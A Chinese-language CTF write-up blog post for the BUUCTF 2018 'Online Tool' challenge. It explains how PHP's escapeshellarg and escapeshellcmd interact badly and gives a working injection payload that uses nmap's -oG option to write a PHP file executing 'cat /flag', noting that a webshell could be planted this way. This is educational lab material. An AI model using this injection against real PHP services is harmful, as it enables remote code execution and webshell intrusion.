[CTF]WriteUp第3篇

于 2024-10-05 19:15:59 发布
阅读量255 收藏 5
点赞数 3
分类专栏: 每日WriteUp 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/poiiuytree233/article/details/142717787
版权

本文同时发布到我的个人blog:

[CTF]WriteUp第3篇icon-default.png?t=O83Ahttps://lingye.space/index.php/2024/08/30/ctfwriteup%e7%ac%ac3%e7%af%87/

[BUUCTF 2018]Online Tool

思路

RCE指的是远程代码执行漏洞
这题看来关键是构造$host,想办法输出flag
代码中有两个转义函数escapeshellargescapeshellcmd,我们先弄懂这两个函数的作用

参考文献:escapeshellarg参数绕过和注入的问题_escapeshellcmd-CSDN博客

escapeshellarg(string $arg): string
-param:
$arg: 要转义的命令
-return:
转义后的字符串

转义的方式为:
escapeshellarg()会给一个字符串加上单引号,并对任何现有的单引号进行转义,这样就可以直接将字符串传递给 shell 函数,使其被视为一个安全的单引号参数。此函数应用于对来自用户输入的 shell 函数的单个参数进行转义。shell 函数包括 exec()system() 和反引号运算符。
在 Windows 上,escapeshellarg() 会用空格替换百分号、感叹号(延迟变量替换)和双引号,并在字符串周围添加双引号。此外,对于连续的反斜杠(\)序列,会用一个额外的反斜杠进行转义。

<?php
echo escapeshellarg('Hello');
// 输出值为:'Hello'
echo escapeshellarg('Hello\'');
// 输出值为:'Hello'\'''(在命令行使用 echo 'Hello'\''',只会输出 Hello')

escapeshellcmd(string $arg): string
-param:
$arg: 要转义的命令
-return:
转义后的字符串

转义的方式为:
escapeshellcmd() 会将字符串中的任何字符转义,这些字符可能被用来欺骗 shell 命令执行任意命令。该函数应在将数据传递给 exec()system() 函数或反引号运算符之前使用,以确保来自用户输入的数据被转义。
以下字符前缀以反斜杠(\): &|*~<>^(){}$\\,\x0A\xFF。如果 '" 未成对出现,则仅对其进行转义。在 Windows 上,所有这些字符加上 % 前缀以一个叹号()。

解题

payload构造:参考文献:[BUUCTF 2018]Online Tool - 春告鳥 - 博客园 (cnblogs.com)

例:
<?php
$host = '172.17.0.2\' -v -d a=1';
// -> 172.17.0.2' -v -d a=1
$host = escapeshellarg($host);
// -> '172.17.0.2'\'' -v -d a=1'
$host = escapeshellcmd($host);
// -> '172.17.0.2'\\'' -v -d a=1\'
echo `curl `.$host;

// 传入的参数是:172.17.0.2' -v -d a=1
// 经过escapeshellarg处理后变成了'172.17.0.2'\'' -v -d a=1',即先对单引号转义,再用单引号将左右两部分括起来从而起到连接的作用。
// 经过escapeshellcmd处理后变成'172.17.0.2'\\'' -v -d a=1\',这是因为escapeshellcmd对\以及最后那个不配对儿的引号进行了转义:http://php.net/manual/zh/function.escapeshellcmd.php
// 最后执行的命令是curl '172.17.0.2'\\'' -v -d a=1\',由于中间的\\被解释为\而不再是转义字符,所以后面的'没有被转义,与再后面的'配对儿成了一个空白连接符。所以可以简化为curl 172.17.0.2\ -v -d a=1',即向172.17.0.2\发起请求,POST 数据为a=1'。

同时nmap有一个-oG参数,可以控制输出:

OUTPUT:
  -oN/-oX/-oS/-oG <file>: Output scan results in normal, XML, s|<rIpt kIddi3,
     and Grepable format, respectively, to the given filename.

即构造如下即可,其实到了这一步也可以传马:

?host=' <?php echo `cat /flag`;?> -oG test.php '

得到

注意

``是PHP里面的执行运算符,PHP 将尝试将反引号中的内容作为 shell 命令来执行,并将其输出信息返回。使用反引号运算符`的效果与函数 shell_exec() 相同

poiiuytree233
关注
专栏目录
个人CTF入门训练过程WriteUp
LastButNotLeast的博客
11-18 1917
(view-source:http://www.monyer.com/game/game1/) 查看网页源代码 → <a href="first.php"></a> ← php
CTF WriteUp】2020网鼎杯第一场部分题解
01-20
第三关解一元二次方程,找正数根x=89127561。全过得flag you raise me up 本题中,模数n = 2 ** 512,所以此处可以使用Pohlig-Hellman算法逐渐升模求出flag。该算法的原理核心,在于已知x % 2 ** k的情况下,如何求...
[CTF]WriteUp第2
最新发布
poiiuytree233的博客
10-05 219
[网鼎杯 2018]Fakebook
[CTF]WriteUp第1
poiiuytree233的博客
10-05 167
[MRCTF2020]你传你🐎呢 [网鼎杯 2020 青龙组]AreUSerialz [CISCN2019 华北赛区 Day2 Web1]Hack World
Hacker101 CTF Writeup
2401_84466227的博客
05-30 864
本教程的目的决不是为那些怀有不良动机的人提供及技术支持!本教程的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失。对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。Hacker101 CTF 分为不同的级别,每个级别都包含一定数量的标志。Hacker101 CTF是一款旨在让您在安全、有益的环境中学习黑客攻击的游戏。返回主页面发现这里用了 include()函数的功能。
2017ctf writeup
T20070610080122的专栏
07-04 2857
2017火种ctf  writeup
CTF新生赛之Writeup
shikaku_的博客
11-27 4792
CTF新生赛之Writeup 作为零基础的新生,也是在开学后才了解了CTF,感觉本次新生赛中颇有收获,也是应赛制要求,故写下这份WP,以纪念本人的第一次CTF竞赛。 回顾和感想 Misc 我也不知道为什么我要写这个,我就写了签到题哈哈哈哈哈 过程是关注微信公众号SCUCTF,发送SCUx401CTF即可获得flag(不放图了) Web 因为是从Web入的门,所以先做的Web。这次新生赛做了六道题,都是非常简单的。因为看不懂PHP语言所以无法继续向前走了555, Crypto ...
BugkuCTF Writeup——Web
Lethe's Blog
03-07 3299
BugkuCTF Web——Writeup 作为我这个新手刷的第一个平台,bugku上面的大部分题目还算蛮友好的,这里主要记录一下其中我认为还蛮有意思的题目。 web2 直接查看F12查看源码即可得flag。 计算器 简单计算题,但输入框限制输入长度,直接改改输入框的前端代码,输入计算结果,得到flag。 web基础$_GET 代码审计,GET方法传入what变量的值为’flag’即可得fl...
2023第五届 Real World CTF 体验赛 Writeup(web)
一只爱吃橙子的羊
01-12 2718
2023第五届 Real World CTF 体验赛 Writeup(web)
BugKuCTF-杂项-writeup 大全?
热门推荐
疯狂棒棒糖的博客
06-20 1万+
最近玩了一个 CTF 的练习平台-----BugkuCTF下面会把一些题目的方法记录下来先讲一下杂项1.签到题只要关注公众号就可以得到 flag---开胃菜2.这是一张单纯的图片网站上打开是无法加载,将图片保存到本地是个小兔子,然后用编辑器打开图片,发现了最下面一行的 unicode 编码,解密就有 flag...
Codefest'2019 CTF writeup-b64_c3VuJTIwYm95.docx
11-29
Codefest'2019 CTF writeup 是一关于网络安全竞赛的总结,主要涉及的是在Codefest'19夺旗比赛中的几个挑战解决方案。CTF(Capture The Flag)是一种流行的安全竞赛,参赛者通过解决各种安全相关的谜题来获取“旗帜...
【C语言系统编程】【第三部分:网络编程】3.2 数据传输和协议
10-03 1416
在进行网络编程时,有时需要设计并实现自定义协议,以满足特定应用的需求。自定义协议设计需要考虑到数据的传输、安全、效率等多方面因素。清晰性:协议应具有清晰的语法和语义,使开发者能快速理解和实现。扩展性:协议应允许未来的功能扩展,而不破坏现有功能。安全性:数据传输过程中应考虑加密和校验,以保证数据不被篡改。高效性:应尽可能减少网络带宽占用,提升数据传输效率。容错性:协议应能处理各种网络异常情况,如数据丢失、重复和延迟。
基于php的幸运舞蹈课程工作室管理系统
计算机学姐的博客
09-28 1032
【2025最新】基于php+vue+MySQL的幸运舞蹈课程工作室管理系统,前后端分离。
PHP安装后Apache无法运行的问题
Bingyeshinvwang的博客
10-01 677
php安装之后,修改httpd.conf无法运行Apache的解决方案
Thinkphp/Laravel基于vue的少数民族民歌网络图书馆管理系统
abo2022的博客
09-30 1203
ThinkPHP是一个快速、简单的基于MVC和面向对象的轻量级PHP开发框架,遵循Apache2开源协议发布,从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,尤其注重开发体验和易用性,并且拥有众多的原创功能和特性,为WEB应用开发提供了强有力的支持Laravel非常的简洁并且是开源的,Laravel 是一个具有表现力、优雅语法的 Web 应用程序框架. Laravel 是构建现代全栈 Web 应用程序的最佳选择.
CMSIS-RTOS V2封装层专题视频,一期视频将常用配置和用法梳理清楚,适用于RTX5和FreeRTOS(2024-09-28)
Simon223的博客
10-04 687
CMSIS-RTOS V2封装层专题视频,一期视频将常用配置和用法梳理清楚,适用于RTX5和FreeRTOS(2024-09-28)
php socket客户端
qq_30754685的博客
09-30 355
在软件管理里面安装composer,再在网站管理安装扩展socket。使用的工具为phpstudy。
Spring Boot框架下的新闻推荐技术
2401_85342379的博客
10-04 584
同时也大大提高了手的能力,使其难以充分体会探索的乐趣和成功的创作过程,设计过程中汲取的东西,是一笔宝贵的财富。为系统提供强大的数据库备份工具。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值